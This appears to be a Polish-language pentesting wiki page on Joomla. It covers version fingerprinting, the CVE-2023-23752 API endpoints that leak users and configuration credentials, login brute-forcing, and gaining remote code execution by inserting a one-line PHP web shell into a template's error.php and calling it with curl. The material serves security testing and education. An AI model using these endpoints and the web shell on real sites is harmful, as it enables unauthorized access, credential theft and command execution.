Joomla
Statystyki Joomla
Joomla zbiera anonimowe statystyki użycia, takie jak podział wersji Joomla, PHP i baz danych oraz systemów operacyjnych serwerów używanych w instalacjach Joomla. Te dane można zapytać za pośrednictwem ich publicznego API.
Enumeration
Discovery/Footprinting
Sprawdź meta
robots.txt
README.txt
Wersja
W /administrator/manifests/files/joomla.xml możesz zobaczyć wersję.
W /language/en-GB/en-GB.xml możesz uzyskać wersję Joomla.
W plugins/system/cache/cache.xml możesz zobaczyć przybliżoną wersję.
Automatyczny
In 80,443 - Pentesting Web Methodology to sekcja o skanerach CMS które mogą skanować Joomla.
API Nieautoryzowane Ujawnienie Informacji:
Wersje od 4.0.0 do 4.2.7 są podatne na nieautoryzowane ujawnienie informacji (CVE-2023-23752), które ujawnia dane uwierzytelniające i inne informacje.
Użytkownicy:
http://<host>/api/v1/users?public=true
Plik konfiguracyjny:
http://<host>/api/index.php/v1/config/application?public=true
Moduł MSF: scanner/http/joomla_api_improper_access_checks
lub skrypt ruby: 51334
Atak Brute-Force
Możesz użyć tego skryptu aby spróbować przeprowadzić atak brute force na logowanie.
RCE
Jeśli udało ci się zdobyć dane logowania administratora, możesz uzyskać RCE w jego wnętrzu, dodając fragment kod PHP, aby uzyskać RCE. Możemy to zrobić, dostosowując szablon.
Kliknij na
Templates
w lewym dolnym rogu podConfiguration
, aby otworzyć menu szablonów.Kliknij na nazwę szablonu. Wybierzmy
protostar
w nagłówku kolumnyTemplate
. To przeniesie nas na stronęTemplates: Customise
.Na koniec możesz kliknąć na stronę, aby otworzyć źródło strony. Wybierzmy stronę
error.php
. Dodamy jednolinijkowy kod PHP, aby uzyskać wykonanie kodu w następujący sposób:system($_GET['cmd']);
Zapisz i zamknij
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated